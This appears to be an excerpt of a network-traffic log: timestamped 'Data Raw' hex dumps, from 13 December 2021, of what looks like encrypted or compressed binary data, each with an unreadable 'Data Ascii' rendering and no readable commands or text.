a2 72 fd 26 7a 75 1f c6 c8 c1 44 19 e4 0f 24 89 09 23 40 ab 61 7e da 02 14 ed 82 7e 62 13 76 63 b4 12 59 35 cd c7 47 92 6f e5
                                                                                              Data Ascii: s1Ab-j./2BL*bOVgJ47mON=X#*{-XozdTI~S7<HG<}2TWbS*es3{PsW(GsiI|!dPY|HCoFjl J``Y03t8C1|naP=sr&zuD$#@a~~bvcY5Go
                                                                                              2021-12-13 23:57:17 UTC6544INData Raw: 34 f0 35 0d 64 9f c5 24 f2 0b 94 c3 65 72 17 26 d8 de e0 d5 2b 43 a3 7b ec 9c 91 05 84 8c 34 9c 34 18 b3 26 4a a2 d5 6e df ce 03 73 a2 90 9e 85 b1 dc f8 25 22 2f ad bc 86 ab ec 96 74 96 23 6a f6 4e 42 ca 4a b5 43 88 21 b3 ec 4b f4 0c e9 34 99 e5 7c 93 43 c8 90 ef 4b 32 a5 33 02 9f 92 d8 1f 5d 33 ae 63 b7 d0 3e 35 73 3b 84 8f b8 bd 03 ed 44 ad 64 e4 7a c0 0b bd d7 fb 31 70 9e 87 98 32 42 b3 15 34 c8 5a e9 c3 9c fc ca 2f 37 95 17 52 15 67 e3 5b 0c d7 63 9e 10 7c 6c f5 c8 70 2f 21 61 96 ab 37 b3 c6 d9 6b fd 75 9c 94 22 09 77 fb 8b 05 33 93 25 71 24 45 cc 52 04 18 b7 f1 c7 13 20 63 17 66 fc f1 17 30 c2 b2 6c 56 88 53 92 6e 71 4e 41 f7 6c 26 d9 64 02 29 e8 cf dc 1b 2c 63 4e e1 dc 9a 59 85 5d bb 25 f4 cc 24 47 b4 b7 e8 c6 02 9d 29 12 27 d9 22 32 a3 a2 b8 80 25
                                                                                              Data Ascii: 45d$er&+C{44&Jns%"/t#jNBJC!K4|CK23]3c>5s;Ddz1p2B4Z/7Rg[c|lp/!a7ku"w3%q$ER cf0lVSnqNAl&d),cNY]%$G)'"2%
                                                                                              2021-12-13 23:57:17 UTC6560INData Raw: 63 6c f4 75 6f 01 3d c8 fe 42 59 59 9f 64 4a 2e 59 3e 70 4a 1d eb 75 0b 9b d7 b3 d8 04 3c c7 0e 4d 41 90 8e c8 17 ce 0d 1d 0c bb 30 69 1a 77 10 d9 14 61 ca b7 b7 1c 36 f4 e4 51 8e 51 91 9d 9c 41 9c a0 f6 75 23 1c 91 d7 26 8e 76 f4 4c cb 7f 65 f5 3a fb b2 4c b7 04 82 3c 78 af d6 21 d0 d6 b5 b5 08 b6 b9 5c 25 67 e3 49 15 bc 37 ce 85 f8 21 23 68 0c 65 7e 70 f5 19 a8 fc b5 36 a5 fb bf d3 42 67 82 f7 fd 81 28 f4 b3 27 36 d0 de 21 fb b6 1b 3e a9 92 bb ed 50 79 d2 c4 32 f2 64 2d 8e bb a7 01 46 07 55 fb f7 98 41 99 17 0d de 91 09 8d a7 d1 4c 53 77 4a af c2 f6 4b 6c 20 90 3d d4 e6 80 e9 85 13 d4 58 40 28 d8 92 3f 5c 1e 9b f4 56 e3 b9 95 7d 32 b7 3c d0 64 ad 8e d7 b4 70 30 2f 07 2e c6 60 f4 47 2a 66 82 52 72 6e b3 1f 85 e5 d0 b3 4e f4 4e f5 a4 63 30 91 b0 64 1d 03
                                                                                              Data Ascii: cluo=BYYdJ.Y>pJu<MA0iwa6QQAu#&vLe:L<x!\%gI7!#he~p6Bg('6!>Py2d-FUALSwJKl =X@(?\V}2<dp0/.`G*fRrnNNc0d
                                                                                              2021-12-13 23:57:17 UTC6561INData Raw: f2 60 27 30 54 b2 6a 77 57 0c 3d 66 d6 82 ed 8b 15 6c 88 31 0d ae ff 36 e2 73 d9 af 47 29 d1 5f 87 9d a5 2c 92 4c fb d7 da 79 15 f6 9e aa a1 47 20 a0 29 6a a2 1c 28 6c 40 51 bf f5 b7 5e 4b 36 ca ae 30 58 a4 63 21 64 e1 10 44 dc 35 a7 f3 36 7f 6d c4 36 d3 78 08 58 64 df bc 34 65 d9 44 69 96 b3 31 8e 0f c7 7a 7f 11 9a ea f7 b9 24 1a fb b0 8d 98 27 a0 9e b4 67 ce 39 76 af c0 e8 54 81 ac e8 09 98 c1 d0 2c 37 3d ad aa 94 24 11 dd 39 04 8d 82 d7 7e 84 16 f4 42 e0 06 de 37 9d 5a 16 16 93 ef 25 78 32 b7 a5 5c 03 ac 44 38 42 8e 9f 1f 8f 17 ec 64 32 23 87 a6 d9 36 d3 2b 5b a5 9d f6 20 3e 17 5c b5 9c ce bf 02 d3 dc c9 67 32 29 08 26 48 09 5b 76 a9 20 d5 12 db 21 ab 71 ec ca 66 9e 3e b5 2f 10 0a 3f ed e6 f3 65 96 12 2d 1c b1 2f ec 8e f1 eb 6c 0c 69 0e 31 07 61 0c c9
                                                                                              Data Ascii: `'0TjwW=fl16sG)_,LyG )j(l@Q^K60Xc!dD56m6xXd4eDi1z$'g9vT,7=$9~B7Z%x2\D8Bd2#6+[ >\g2)&H[v !qf>/?e-/li1a
                                                                                              2021-12-13 23:57:17 UTC6577INData Raw: a1 e6 18 d3 fc c5 05 ea c8 55 0e ca ff e2 d6 dc c0 fd f4 bf 1c 02 38 df f8 18 8d 83 9a 74 e0 c7 5e ed 26 50 2c 89 e6 f4 20 74 27 69 9a 6d 60 7f cb 06 5b 10 eb c9 fc e3 99 38 76 c7 47 36 30 ee 84 4c f9 0b b3 b2 df a3 e5 9b a3 4b 6c 71 2f e0 e8 82 fa 70 63 ba ed ac 1b 4f 35 fd 63 56 f6 43 bb e7 2c 97 ff 1b c3 f4 e4 c9 9a f0 35 77 ed de 2b ee b4 00 a7 15 55 8d 08 77 d1 b6 2d 48 be 63 f9 db 72 bd ed ef 8b 03 b5 4d ef 08 ec b7 52 b4 af 31 f3 69 54 ca e9 2e 69 c4 5e 6f d9 91 a0 c1 b5 f7 4a e3 35 32 2a 32 de 82 89 cf 2b 59 b0 42 f2 84 bd 5d 58 f0 67 17 da 0a a5 22 75 fd 60 41 41 58 29 7e 42 a3 ab 2f 70 f9 f1 f4 54 be 46 84 82 c1 be e5 7b dd c8 cf 82 52 d5 6f be f5 2b 82 0c 8f 79 5e e4 fb 94 39 90 fb 35 09 07 f6 2c 66 0f 00 4f de 9c f3 bf 84 df 24 d1 51 28 0a 67
                                                                                              Data Ascii: U8t^&P, t'im`[8vG60LKlq/pcO5cVC,5w+Uw-HcrMR1iT.i^oJ52*2+YB]Xg"u`AAX)~B/pTF{Ro+y^95,fO$Q(g
                                                                                              2021-12-13 23:57:17 UTC6578INData Raw: 8f c7 8a e6 5f e0 9c 61 b7 c0 7b e4 d1 9e a9 4b 00 a3 44 4d 96 19 98 7a da ab 03 61 93 6a dd 66 83 e0 30 85 61 ba 11 3a 5b 79 b3 48 0c fe 44 6a 2f e4 03 5a 2e 6e 32 26 10 9f 91 f9 94 54 ed 63 38 b7 f4 58 50 f0 10 bd ae 1d 7c d4 b4 2f f0 1d 73 d5 1a c0 06 f2 29 68 1c b1 d9 f9 e7 d1 e1 3c 42 dc 83 43 1e ee 01 65 99 78 bd 69 f9 24 03 4a 32 1e 4a e3 2c 43 71 2b 49 88 e3 d2 6c e7 c0 9e 4b f8 8d 9d 67 69 ce 15 f9 c6 18 b2 ae 56 0f b9 5a 00 3e 80 3c 73 a5 ff d0 00 50 ff 26 2f f9 f2 85 e0 0b a9 66 eb 92 95 f7 ab 81 6f b4 8e b8 95 ad 5a bc 80 3a f7 3d 87 c2 ca 3a 20 dd d3 45 bb 5f 38 57 c6 a3 02 1b 53 eb 55 cb 0d 8b d2 05 20 c5 74 58 c7 19 88 a1 c8 85 24 7f be 59 00 76 de 4e 9a 20 5e a9 6f 62 de 68 06 a8 12 08 6c f1 ea 5c 1a c9 49 69 6e d9 d9 dc 8d ba 85 94 a9 32
                                                                                              Data Ascii: _a{KDMzajf0a:[yHDj/Z.n2&Tc8XP|/s)h<BCexi$J2J,Cq+IlKgiVZ><sP&/foZ:=: E_8WSU tX$YvN ^obhl\Iin2
                                                                                              2021-12-13 23:57:17 UTC6594INData Raw: ab ff 17 42 16 4f a2 49 a5 18 5d ab 2d 11 05 62 3b 38 0f d2 74 7f 50 56 91 93 68 55 05 35 87 5e 99 af 2a 16 97 6a ef 84 39 d1 a4 62 b2 6c 2e 5c 7a 0c 92 3f 29 75 78 b8 f7 40 49 f7 68 d9 d9 f6 ca 08 a7 6d 41 07 0a 75 71 5b fe 2f 45 93 7d 45 aa e3 45 25 65 5e 49 a5 0f e8 9d bd bd 7f c9 a3 ca ce 66 48 52 b4 ba 73 6a 8b 4a 9d d8 b7 22 b8 0c fd ea c6 e1 14 44 cb 3b 46 4a 70 61 3c d3 05 85 ab 3d 17 40 30 fd 00 5f 7e 95 d4 4a 68 59 17 f2 65 0c 72 40 68 7e 14 df 45 d2 20 42 1f 0f 1d 2f fa 89 af fd 92 e1 4b fd 8f 7c e6 a5 c2 64 d5 35 d9 ba 81 da c5 bf 7b 68 b2 4a c7 ff 74 48 5b 79 07 ea 60 62 6c ff e7 ce 7b f2 09 87 08 8e a5 a2 2b 84 39 b0 34 3d 87 93 a3 ec 4c 21 5c a4 1f 4b 1b e5 d3 79 52 b4 fb 47 6e a9 6b e8 aa 97 f2 3d 2e 2d 10 95 39 73 d3 dc 16 25 ad 8e 9d 29
                                                                                              Data Ascii: BOI]-b;8tPVhU5^*j9bl.\z?)ux@IhmAuq[/E}EE%e^IfHRsjJ"D;FJpa<=@0_~JhYer@h~E B/K|d5{hJtH[y`bl{+94=L!\KyRGnk=.-9s%)
                                                                                              2021-12-13 23:57:17 UTC6595INData Raw: 58 6f f6 cb 8f 3e bb 73 d5 d0 1b 28 44 ea 78 bf 47 18 e7 b5 00 34 70 ee 57 cc d0 3d 3d 2d f4 c8 13 0f 53 43 9a 83 79 71 f0 e0 c4 82 2e fa 0c 6a b7 f7 5a 6e 92 fd 31 27 7b ee 08 5d ba ea 8d 65 00 19 9e 1b 3d 0c e6 fe bd a2 f4 a6 85 48 9e cc b8 96 a0 f4 14 ed bd 8d 7c 69 17 da db 42 f2 99 dd 52 e1 19 e0 72 53 1e 36 36 ea 24 da 82 6c 77 5d 52 ca b5 d2 f2 17 79 b0 a3 f8 f3 d7 76 bf f8 8c 92 5b 90 26 1e 6c f8 47 b0 48 2c 5f 86 e7 66 c7 2d 5f 90 1e 1c 7d e8 b0 06 7e de 49 45 a8 55 f5 f0 a2 b3 70 01 f4 3f c5 96 b9 89 a6 a9 c4 9b 44 46 14 48 df e7 84 9b 38 33 9e cc 86 62 17 9b 57 ed 8a c9 79 6c fc 73 cb 94 1d 5c a4 92 70 57 85 11 d1 61 81 f8 a7 55 fc 0e 23 d0 b8 7d 34 7d 53 3b 7a a4 b9 41 5a 90 89 31 31 4c 08 b5 9f 8b c4 e0 ff 07 95 26 63 c9 84 8a f5 aa 5e 95 ed
                                                                                              Data Ascii: Xo>s(DxG4pW==-SCyq.jZn1'{]e=H|iBRrS66$lw]Ryv[&lGH,_f-_}~IEUp?DFH83bWyls\pWaU#}4}S;zAZ11L&c^
                                                                                              2021-12-13 23:57:17 UTC6611INData Raw: c7 c0 2c 17 0f 29 4e 0d a6 0a 2b 10 84 65 fa 53 11 26 77 fc 6a 96 a6 19 6b dd 97 9f b9 91 e8 7f 5a 72 15 da f7 6c bb 40 1a 45 2e 19 a9 cc 5f 17 29 51 15 fc a2 81 a1 4e c7 5b ae a1 dc 2a b6 de 8a 80 2f c4 e9 4e 3b 67 74 2d 0a b9 6f 18 91 12 3d 47 85 5c bd 0a 6c 1e 86 86 c5 06 e7 af 69 76 f1 1a d4 5f b4 08 12 69 c1 a9 5e db 76 ab 9c e5 89 0f 94 9c 13 34 d0 f6 e7 19 81 27 00 f4 e0 99 fc 5e c2 b2 5a ba 85 3b 13 34 7c 89 92 ad cf 78 39 a3 89 1d 61 46 de c0 9d 85 db 01 88 92 ce 9c 79 e0 a6 d7 84 e9 38 8e 1d 15 39 64 a1 d4 2d 3d 6b 80 37 90 bc 0b 68 97 6e 5b 87 59 be cc 97 6c 61 df 93 cd 9a a7 62 2a a9 ec 86 81 5c 2c 4e 9b 6a 5e 93 30 a5 0c 30 af 77 af 2b 33 81 ae 63 e3 e6 d8 33 09 ba 21 7d e9 9e c0 6f fc cc bf 75 7e 2e b6 30 8c f0 b8 ce b0 ff a3 41 b0 8a 27 90
                                                                                              Data Ascii: ,)N+eS&wjkZrl@E._)QN[*/N;gt-o=G\liv_i^v4'^Z;4|x9aFy89d-=k7hn[Ylab*\,Nj^00w+3c3!}ou~.0A'
                                                                                              2021-12-13 23:57:17 UTC6612INData Raw: a2 26 fd 7f c8 da d0 c0 d8 d0 9c 59 bd 0e fc 69 ec 9a ba f1 88 b2 a6 0f 5b 07 24 31 5e 4a 77 ee 0e ad de 0f d0 19 33 3d 1e 32 4b b2 0b af 30 9b e4 6b cd 95 d6 37 96 51 53 a5 e3 f0 4f d7 e0 1b e5 e1 9d aa 61 90 2e c2 b9 91 f2 e5 6d d1 97 81 41 f9 3b 11 22 9a d2 6c f3 79 61 41 c0 63 10 10 53 7c 96 ea 62 31 fe 0a 5d 70 6f 24 2e 4f d3 e2 7f a1 84 1b db fa 11 17 41 7a fb b4 f3 1a dc 02 c2 b5 56 f4 56 67 a1 65 5d 6d 88 fe fb a1 78 cd 0a fd 7b ca a8 5b 90 3d e0 11 6c 62 d2 07 91 1a e5 e0 98 02 14 b7 61 4f 93 d5 eb 0b fd 25 94 55 32 9c 84 c6 46 41 fd f0 40 bd 51 0d 00 0b 57 b2 31 94 b7 af c8 15 99 55 b5 0a eb de be 24 ca ed c4 38 66 f5 e5 9a ee 22 57 9b 15 c4 9d 3b d7 be ff 57 0b 8c df cd 29 6a 10 02 90 6f 8e a1 80 06 7f a6 c1 6e ea d8 ad c7 70 f4 9d 8d da c3 ab
                                                                                              Data Ascii: &Yi[$1^Jw3=2K0k7QSOa.mA;"lyaAcS|b1]po$.OAzVVge]mx{[=lbaO%U2FA@QW1U$8f"W;W)jonp
                                                                                              2021-12-13 23:57:17 UTC6628INData Raw: 5f 47 c8 39 80 18 b7 62 6a b8 cc cb ba 0d b8 42 5a 15 9c 72 c6 59 e9 41 de a8 18 37 10 05 aa ed 59 cc 59 5d af 9d 66 d7 a7 5b d4 4d b2 09 15 79 50 c4 d6 b4 ed 3e b0 21 c4 49 80 a2 31 51 12 2d f7 c2 7c 62 fb 5a 6f 41 46 5a 22 2a fe 36 c2 22 24 46 04 dd 9b 67 06 92 70 3f 32 df ba 73 b4 8e d7 49 40 b4 d1 04 d6 b1 1a c1 25 69 d4 88 71 5e 72 9d e8 4f 81 02 b6 69 1a 60 42 19 32 5c 62 9c 8f 64 b3 2b 64 3e 32 db bf af 9b 36 a3 f1 43 86 4b 2b 08 5d 33 50 5d 59 f9 a4 4e 92 21 b0 b3 44 69 e2 31 0b 6c be 19 3a f5 ff 5d 49 19 a0 ce 2b f1 7d 91 c3 70 68 d3 ff a4 49 8f 1a 2b df fd 3f 32 80 b6 06 28 67 d3 e7 65 96 f1 f7 70 15 63 17 e6 11 b5 8b 18 b2 5a dd 9e 6a 47 6d 31 e8 a7 f8 9d c9 f1 29 a6 ca 9f 50 2b 52 2e c7 e4 c9 4b 31 04 40 2a 67 d3 3f 81 24 05 e9 90 92 28 74 db
                                                                                              Data Ascii: _G9bjBZrYA7YY]f[MyP>!I1Q-|bZoAFZ"*6"$Fgp?2sI@%iq^rOi`B2\bd+d>26CK+]3P]YN!Di1l:]I+}phI+?2(gepcZjGm1)P+R.K1@*g?$(t
                                                                                              2021-12-13 23:57:17 UTC6629INData Raw: 74 e4 0b 6b a8 d7 e3 1c ec 8f ab fd 86 01 ea 17 ae 27 36 06 40 9a 9c 25 53 53 bf 1e f7 9b fe 5a cf 7b 99 dc a2 d0 2f b8 39 ed fc ac 3d d0 a7 80 95 20 e2 f2 6c ea 6b 6a df 5f 70 62 94 6e 49 8b dc e4 b6 46 b4 9a aa cd 6f 9e a7 6b a1 52 b1 53 3b 02 c4 40 6d dd a4 fa 17 90 00 ea 97 36 b4 52 4c b8 d9 b2 5e 05 d8 d3 93 ae 4e 74 d3 ac 4d 99 64 ad d0 33 a1 d5 69 b4 35 43 5b 91 47 b0 a7 50 9f 82 2b bb 22 27 52 87 05 a7 83 63 50 5f 7f a1 63 56 0d 1e a5 36 75 89 c0 76 1c 21 4b df a4 7f 6a 8e 27 97 5b c8 c4 1f f8 60 db d8 30 81 d0 68 f1 22 1a c6 67 49 4f c5 00 14 d7 95 ea 8f a0 8e d6 26 3a 4a 82 50 b3 90 7d 48 20 89 6a d0 15 33 2b a4 27 1a 90 2f e6 38 f2 b0 9b 51 6b d9 ac 4c b1 50 92 b2 34 62 97 16 6d 24 37 cf 8f 51 64 9a f5 89 41 f4 77 8f ce 78 d1 f9 bd db 96 1e 9e
                                                                                              Data Ascii: tk'6@%SSZ{/9= lkj_pbnIFokRS;@m6RL^NtMd3i5C[GP+"'RcP_cV6uv!Kj'[`0h"gIO&:JP}H j3+'/8QkLP4bm$7QdAwx
                                                                                              2021-12-13 23:57:17 UTC6645INData Raw: 81 2f 2e c0 1f d4 05 4b 73 74 f6 44 6a 74 20 2b 0e 23 12 2d e5 48 84 97 80 c7 88 a1 4d 96 3a f2 13 61 05 d9 2a ea 99 f3 8a 6b cb e2 e1 7a d7 87 3f 1a 97 a8 75 2d 55 38 7e d9 d4 3e fd 77 77 05 67 61 6b 41 ac 40 45 0f 9c 8f de 80 c3 d0 c0 f4 75 80 77 09 91 81 40 41 17 46 d5 9a 47 05 7c 58 2d ef 5c cd 0d 8c 66 f7 88 c6 50 a2 1b 12 11 6b 50 0c 41 b0 70 ef 11 06 d7 f9 d1 50 5e 8d 99 9c 19 ad cb 4c a3 22 4f a0 bf e5 84 27 5f 1f 79 7f e7 e3 9d 54 e3 aa e8 d1 8f 7f 44 b8 7e 25 d5 5c 2f b3 b1 ea 95 26 d1 1e de 1f b7 79 e9 3f 8e be 3c 08 e0 4c b4 38 e4 67 0c a3 a5 3c c5 8f a5 40 0b 03 b8 c5 f6 50 65 47 1a bc 9a cd f1 c6 9d de 69 39 e5 85 96 20 fb 7f b3 4d e4 ec a6 d2 0c dd b3 d1 ff fa a0 4d 20 aa 2a 74 d9 23 7a 09 b2 85 ad 9a a3 26 8a 38 86 5c fc 10 18 f1 55 65 c6
                                                                                              Data Ascii: /.KstDjt +#-HM:a*kz?u-U8~>wwgakA@Euw@AFG|X-\fPkPApP^L"O'_yTD~%\/&y?<L8g<@PeGi9 MM *t#z&8\Ue
                                                                                              2021-12-13 23:57:17 UTC6646INData Raw: b6 c8 d2 a7 26 f0 34 e5 37 ea 77 90 65 42 55 94 85 64 9f 41 ae e4 e6 bc 98 b3 9d 2a f2 5a 81 d2 23 12 46 2e cd 94 6a 83 97 1b b2 0e 54 9c ad 7b 1d 2f b6 c5 4f 49 4e 21 b8 58 ee d0 31 3c d0 77 23 81 b7 ba 88 0a da 5a d5 ed 56 03 7f a8 ee 04 7c 6c ea af 51 ff 15 c4 2f 03 81 f6 d9 db 7b ff de 60 8e fb 95 fc 96 d4 13 f6 03 05 5b 61 3e 39 3b b6 66 5e e6 f6 6b eb 9e d1 47 0b 59 eb 33 70 26 d1 ba bc ff f4 8b 26 7a 96 8d 16 14 a4 0e 3f db e0 0b ec 7f d1 8e e5 29 f6 df 21 0f f5 ad d1 7d d0 41 eb 14 5b 43 17 7b ec ee 0a 60 be 2d 1c 95 04 e9 40 3b 3d 69 8b 7c 45 60 c0 b3 28 13 b9 77 66 6b 75 48 95 c0 d5 5e d0 86 bc 7d 3c b0 f0 c4 c4 e4 eb 20 01 8e 12 2f fb 6c 00 5d d8 52 aa 34 31 d0 7b 98 53 fb b8 4f 02 59 3c a3 b3 91 cf d5 45 c4 40 47 5c ed 16 d2 d7 37 36 e3 c1 5a
                                                                                              Data Ascii: &47weBUdA*Z#F.jT{/OIN!X1<w#ZV|lQ/{`[a>9;f^kGY3p&&z?)!}A[C{`-@;=i|E`(wfkuH^}< /l]R41{SOY<E@G\76Z
                                                                                              2021-12-13 23:57:17 UTC6662INData Raw: fc b6 db ba 62 60 4f 51 a2 85 a7 99 06 70 33 2c b8 87 0e c8 cb b1 b0 1a e4 81 41 bf de 41 c1 42 74 42 d5 89 d1 0c ad 96 7c 9f 1f 17 a9 56 d6 5e fa 84 bc f7 b9 48 a2 37 ef 44 bd 7d de 75 70 25 27 1f 90 f6 d8 2c f9 43 f5 2e 08 a6 68 cc 0d 4a 9f bd e9 34 c5 5a 00 1a 06 6d 11 12 bf 33 b2 33 d4 3f 10 05 76 da 53 1d c0 aa 0b a2 6d 84 86 60 b8 c2 51 fb 21 9c 60 5f 68 f2 5d ce 6c 10 fc 34 2b 3a 80 55 aa 1a 44 73 97 7f d1 6b 2a 43 f1 bd da cd 86 bf 45 60 6a 1f c2 af 0b 34 55 3c 7b c6 e6 85 a0 eb 85 8f 80 7b 94 8c a8 e2 37 c7 65 ff 52 f8 a9 12 10 b9 36 18 24 aa 3b 4f fa 60 40 32 e4 6c 45 a5 bf aa 8b fc 84 ef 45 0d 09 7a 97 46 28 42 92 36 cf 85 0c 69 fe c5 2f 64 e9 57 9c dc 3b f9 6e c6 29 35 5f 56 19 78 30 f5 b3 e6 a9 57 bd 8e bd 87 d9 09 f8 bc 84 31 19 99 79 4f c0
                                                                                              Data Ascii: b`OQp3,AABtB|V^H7D}up%',C.hJ4Zm33?vSm`Q!`_h]l4+:UDsk*CE`j4U<{{7eR6$;O`@2lEEzF(B6i/dW;n)5_Vx0W1yO
                                                                                              2021-12-13 23:57:17 UTC6663INData Raw: 0d d4 64 76 d2 de ac cc 1d 47 e1 c7 95 0d aa 55 f9 db d9 11 d8 1f 64 66 02 8c e5 82 ec 57 10 b1 05 83 ef 5b f7 87 76 2f 3b bb 59 60 c4 01 ed 18 e3 27 e6 12 58 90 15 59 9b 70 61 71 43 5d f2 01 cf e9 29 e3 39 a2 85 32 e6 39 e6 79 02 0a e5 49 fe 49 7d 60 a3 eb 12 03 e3 d8 0e 7e 34 23 82 f0 85 34 a9 38 45 b2 a4 3f 9f 3c 1a 3c 91 12 ab eb ca 7e 64 7f 66 0b cf 0d f2 3b f7 6b db 8b 09 56 d1 9e fe 10 88 4d 31 60 fe 23 a1 ff 02 a2 3b 37 1f 1a 41 d6 71 fc 69 76 df 9c a9 c4 8d c7 04 99 62 df 28 17 96 6c 34 d0 fd cf 39 a0 48 a2 6b f8 08 8c 3d 55 31 ad 69 0a 45 72 3f ed c1 06 ae 75 f7 09 7f 28 03 32 30 73 46 1f dc 2b 4e 4e e4 f6 91 c7 8b 44 d1 a5 17 a3 f5 b4 9d de 0c 6b 57 f6 a6 af b5 07 2d 50 34 7b ed 15 00 4d 2c 7e d6 bb af 87 ab ca 38 cd a2 b4 02 03 a7 a7 11 49 81
                                                                                              Data Ascii: dvGUdfW[v/;Y`'XYpaqC])929yII}`~4#48E?<<~df;kVM1`#;7Aqivb(l49Hk=U1iEr?u(20sF+NNDkW-P4{M,~8I
                                                                                              2021-12-13 23:57:17 UTC6679INData Raw: 6c a8 48 df a6 79 11 cd 9b f5 8f 4c bc 2f 48 d9 84 02 8d f4 7e 64 83 8c 1b 9c b9 ed d4 ae dc e2 90 57 c9 e6 b0 f6 f0 3b a7 25 d7 29 a4 d2 10 b9 5b 93 3c 59 67 03 5b 1a f1 f5 55 69 c8 47 50 d0 ec b5 ac 7a e9 ac 82 ba 56 00 7c 02 f2 58 be 25 0e 30 08 8e 27 9a be c9 cc a2 93 67 85 0c 46 15 19 ce 3a dd e9 ef 89 6f d6 ea 4f 94 98 49 8f 54 e3 dc 6b d7 00 5e ac 40 41 2a d3 e0 30 61 5d 90 4a 3e c7 44 45 c9 1e df cf 08 ab 56 dc 2c 3d 10 2c 1a 26 02 48 33 36 63 52 cd 23 2b 42 f3 3d f0 a7 86 5b 5f 67 3e 10 50 7b 83 c5 4f 21 be 38 eb 2d 48 87 c8 fd 39 ce af ff 6f f0 e2 b4 ab a4 c1 14 ab 5a 82 c7 af 7d 8a 33 50 19 47 55 c2 92 ad c9 ee 8d 2d ca 97 ee 7b 46 b8 fd 62 51 3c f9 5f d2 63 ec 7b fb 03 a3 e5 00 cb 67 48 de 9c a4 8c e4 d7 89 90 40 60 66 92 5c aa 53 7f ae a3 3d
                                                                                              Data Ascii: lHyL/H~dW;%)[<Yg[UiGPzV|X%0'gF:oOITk^@A*0a]J>DEV,=,&H36cR#+B=[_g>P{O!8-H9oZ}3PGU-{FbQ<_c{gH@`f\S=
                                                                                              2021-12-13 23:57:17 UTC6680INData Raw: e1 f1 9f 4b 6c 63 85 1b c2 b1 2c 79 fc 58 8f 36 2f 87 d5 e2 5d 73 47 bf 97 d1 e3 d8 a3 49 a6 82 53 e6 72 78 7f 17 ae f4 26 11 f4 b2 96 08 fb 23 cf aa 0b c6 82 e6 00 72 57 7d 0b ed 09 96 c4 e9 c8 32 14 0d fc 81 b2 18 92 07 1d f5 75 80 19 50 63 27 43 b3 dd 78 ca 92 32 70 32 14 5a 48 46 68 a4 ef 9d 47 18 13 35 b4 dc 4e c1 9b 53 88 2d 78 c5 07 37 8d 16 e2 ef e4 8d 83 4b ec c6 c9 f2 2c 86 77 f0 cc 5d 58 f5 f6 71 8d 48 f0 c4 4d 80 51 ec 72 eb 96 a1 9e a0 52 36 81 16 1b 38 c9 a8 38 9c 24 44 34 41 52 11 62 91 8f 2d f5 2e 71 b3 dd 76 c3 1b fe de 23 9d 89 cb a2 51 6c 07 32 da 66 7d 4f c8 c0 bf 36 13 f7 bf aa 5e 64 93 3f 5c bf 00 76 17 8f 15 01 50 72 dd 10 81 b6 d3 42 95 fb 00 1b 3a ce f7 7e 48 68 05 39 75 1a 93 02 9b de 9c 84 7b 3f 15 9b 42 4f ae a6 db d5 2e 5e 36
                                                                                              Data Ascii: Klc,yX6/]sGISrx&#rW}2uPc'Cx2p2ZHFhG5NS-x7K,w]XqHMQrR688$D4ARb-.qv#Ql2f}O6^d?\vPrB:~Hh9u{?BO.^6
                                                                                              2021-12-13 23:57:17 UTC6696INData Raw: 88 f2 fc f0 73 9e f7 71 27 12 82 cd 96 18 42 99 1d db fb d4 a3 e6 97 71 ac f0 30 48 90 2a 3a 7b 67 e9 97 8f df 71 d5 a1 c1 c5 6b 8a d5 5b 0e 48 59 84 6c 48 b7 9d 02 b8 6f fe e0 bc 66 e8 d1 7d 4f 8a 05 4a ee 55 0e d5 6b c8 e1 27 7e 08 66 d0 a8 c0 f3 58 0c 7a 50 3f b0 7d 9b a0 9e 32 1e 09 70 12 d9 79 eb d5 c8 fc f4 69 db bb 41 69 25 29 48 10 2f dd 93 83 2a 4e 5d e2 40 8c a8 92 6d 4d dc b9 eb f5 e0 a6 e8 e7 cd c0 e7 8a 5c 35 2a ff e1 68 b6 82 46 8c 05 06 a6 bb b8 47 30 16 ce bf da 81 6c e8 f5 9c 55 e4 b6 61 14 13 93 55 84 69 23 54 c8 1d d0 06 7f 2b 0f 34 3d 0a aa 41 30 ea 94 e3 f4 f9 b5 6c 5a d2 7c 95 4c 90 38 95 ce 70 e4 bf 64 ea ab e9 63 08 9d af b5 b9 7c 1a ae b3 dd f0 4e 1b e4 e8 47 4e 14 90 c6 cf a3 1d 72 ec cc a0 69 ac fd 78 d1 fb 77 6f d9 ab 82 e7 66
                                                                                              Data Ascii: sq'Bq0H*:{gqk[HYlHof}OJUk'~fXzP?}2pyiAi%)H/*N]@mM\5*hFG0lUaUi#T+4=A0lZ|L8pdc|NGNrixwof
                                                                                              2021-12-13 23:57:18 UTC6697INData Raw: e9 85 1d d4 cf f7 ca ad 78 f9 fc ec 91 a1 54 23 82 6e 6f dd 4a c1 98 78 aa e3 1d e3 e8 41 10 c5 43 ee 87 a6 be 4b a6 1a 9b 67 ce cc 9e 02 8e 7c f3 08 27 43 b5 e1 f6 c7 86 0e 6b d0 3a a8 3a b8 89 5e 92 4e 5b 7e 9e e9 87 a6 ba d0 f1 e7 cc 18 0b cc ba 81 8d c1 53 28 ee 4b 72 13 8b 3c a4 60 7d fe 8e 8d 11 cb e6 51 1b 04 49 57 da d0 3d 99 b6 46 f7 70 08 db eb 51 ff e5 9c f4 98 73 72 77 fb ea d4 16 02 82 71 4d 4e cc 68 0b 27 9c 9a 72 04 42 e6 b4 f4 31 b5 8d 0e b3 75 80 ab 05 21 59 b3 ba da 9e 27 e7 52 73 43 94 6e 63 7f 25 8a 7e 45 23 59 e5 90 10 3d cb 89 f8 7f 0d e7 e5 80 39 aa 56 e7 fc 89 eb 6f 20 d2 15 e4 dc 7b c6 78 52 bb 05 54 1a 49 80 9f 64 a3 34 e0 02 6d 9b cf c0 e4 13 d8 a2 86 86 77 33 b4 81 2d 9a ce 6c 26 c2 e7 23 94 0f 65 db 7a 2f 8c c8 fc b5 97 ee 2f
                                                                                              Data Ascii: xT#noJxACKg|'Ck::^N[~S(Kr<`}QIW=FpQsrwqMNh'rB1u!Y'RsCnc%~E#Y=9Vo {xRTId4mw3-l&#ez//
